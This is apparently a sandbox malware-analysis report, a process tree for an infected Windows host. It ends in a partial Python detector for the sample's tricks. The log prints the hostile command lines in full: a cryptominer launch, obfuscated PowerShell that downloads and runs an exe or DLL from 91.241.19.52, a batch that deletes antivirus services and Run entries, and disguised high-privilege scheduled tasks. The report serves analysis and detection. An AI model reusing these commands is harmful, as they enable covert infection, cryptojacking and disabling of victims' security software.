- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\B702.exeC:\Users\Admin\AppData\Local\Temp\B702.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\BB97.exeC:\Users\Admin\AppData\Local\Temp\BB97.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1808 -s 8682⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1808 -s 9082⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1808 -s 9242⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1808 -s 8562⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1808 -s 8962⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1808 -s 9762⤵
- Program crash
-
C:\ProgramData\Runtimebroker.exe"C:\ProgramData\Runtimebroker.exe"2⤵
- Executes dropped EXE
- Drops startup file
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 7363⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 7723⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 7203⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 8443⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 9843⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 10123⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 11403⤵
- Program crash
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.241.19.52/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'3⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://91.241.19.52/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method3⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete 
"HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t 
REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d 
"%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add 
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add 
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete 
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )4⤵
Process tree (indented by depth; command line shown where it differs from the image path):

- C:\Users\Admin\AppData\Local\Temp\BE96.exe
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
    - C:\Users\Admin\AppData\Local\Temp\BE96.exe
      - Executes dropped EXE
- C:\Users\Admin\AppData\Local\Temp\CCFE.exe
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
- C:\Users\Admin\AppData\Local\Temp\CFDE.exe
  - Executes dropped EXE
    - C:\Windows\SysWOW64\WerFault.exe (cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 736)
      - Program crash
    - C:\Windows\SysWOW64\WerFault.exe (cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 760)
      - Program crash
    - C:\Windows\SysWOW64\WerFault.exe (cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 764)
      - Program crash
    - C:\Windows\SysWOW64\WerFault.exe (cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 892)
      - Program crash
    - C:\Windows\SysWOW64\WerFault.exe (cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 856)
      - Suspicious use of NtCreateProcessExOtherParentProcess
      - Program crash
- C:\Users\Admin\AppData\Local\Temp\D26F.exe
  - Executes dropped EXE
    - C:\Windows\SysWOW64\WerFault.exe (cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 732)
      - Program crash
    - C:\Windows\SysWOW64\WerFault.exe (cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 748)
      - Program crash
    - C:\Windows\SysWOW64\WerFault.exe (cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 752)
      - Program crash
    - C:\Windows\SysWOW64\WerFault.exe (cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 880)
      - Program crash
    - C:\Windows\SysWOW64\WerFault.exe (cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 744)
      - Suspicious use of NtCreateProcessExOtherParentProcess
      - Program crash
- C:\Windows\SysWOW64\explorer.exe
- C:\Windows\explorer.exe
- C:\Windows\SysWOW64\explorer.exe
- C:\Windows\explorer.exe
- C:\Windows\SysWOW64\explorer.exe
- C:\Windows\explorer.exe
- C:\Windows\SysWOW64\explorer.exe
- C:\Windows\explorer.exe
- C:\Windows\SysWOW64\explorer.exe
- C:\Windows\system32\schtasks.exe (cmdline: schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe'" /rl HIGHEST /f)
  - Process spawned unexpected child process
  - Creates scheduled task(s)
- C:\Windows\system32\schtasks.exe (cmdline: schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\DtcInstall\explorer.exe'" /rl HIGHEST /f)
  - Process spawned unexpected child process
  - Creates scheduled task(s)
- C:\Windows\system32\schtasks.exe (cmdline: schtasks.exe /create /tn "B702" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\B702\B702.exe'" /rl HIGHEST /f)
  - Process spawned unexpected child process
  - Creates scheduled task(s)
- C:\Windows\system32\schtasks.exe (cmdline: schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\SysWOW64\twinui\explorer.exe'" /rl HIGHEST /f)
  - Process spawned unexpected child process
  - Creates scheduled task(s)
- C:\Windows\system32\schtasks.exe (cmdline: schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Boot\nb-NO\smss.exe'" /rl HIGHEST /f)
  - Process spawned unexpected child process
  - Creates scheduled task(s)
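Two things in the command lines above are worth a detection rule rather than a one-off note: the run of Reg Delete calls that strips security products' autostart values from the Run keys in both the 32-bit and 64-bit registry views, and the schtasks /create tasks that fire ONLOGON at /rl HIGHEST with targets named explorer.exe or smss.exe but placed where those binaries never live (an en-US folder under Program Files\Windows Security\BrowserCore, C:\Windows\DtcInstall, C:\Windows\SysWOW64\twinui, C:\Boot\nb-NO), plus one task launching B702.exe straight from the user's Temp directory. The Python below is an added example written for this page; it is not part of the Triage report or the sandbox's own signatures. It applies those two checks to process command lines the way a consumer of Sysmon event 1 or Windows 4688 events would. The expected-location table and the list of Run-key value names are assumptions lifted from the lines above, not vendor data, and the sample command lines are copied from the process tree.

```python
import ntpath
import re
from dataclasses import dataclass

# Where the binary names impersonated by the scheduled tasks actually live on a
# default Windows 10 x64 install (assumption for this example, lower-cased).
EXPECTED_HOMES = {
    "explorer.exe": {r"c:\windows", r"c:\windows\syswow64"},
    "smss.exe": {r"c:\windows\system32"},
}

# Run-key value names the sample removes; taken from the Reg Delete chain in
# this report, not from any vendor feed.
AV_RUN_VALUES = {
    "avastui.exe", "qhsafetray", "zillya antivirus", "sbamtray",
    "sbregrebootcleaner", "egui", "iseui", "comodo internet security",
    "clamwin", "avira systraystarttrigger", "avgui.exe", "superantispyware",
}

RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run$", re.IGNORECASE)
REG_DELETE_RE = re.compile(r'(?i)^Reg\s+Delete\s+"([^"]+)"\s+/v\s+"([^"]+)"')


@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str


def split_reg_commands(cmdline):
    """Split a run of 'Reg Add ... Reg Delete ...' invocations into one string per command."""
    parts = re.split(r"(?i)\bReg\s+(?=(?:Add|Delete)\b)", cmdline)
    return ["Reg " + p.strip() for p in parts if p.strip()]


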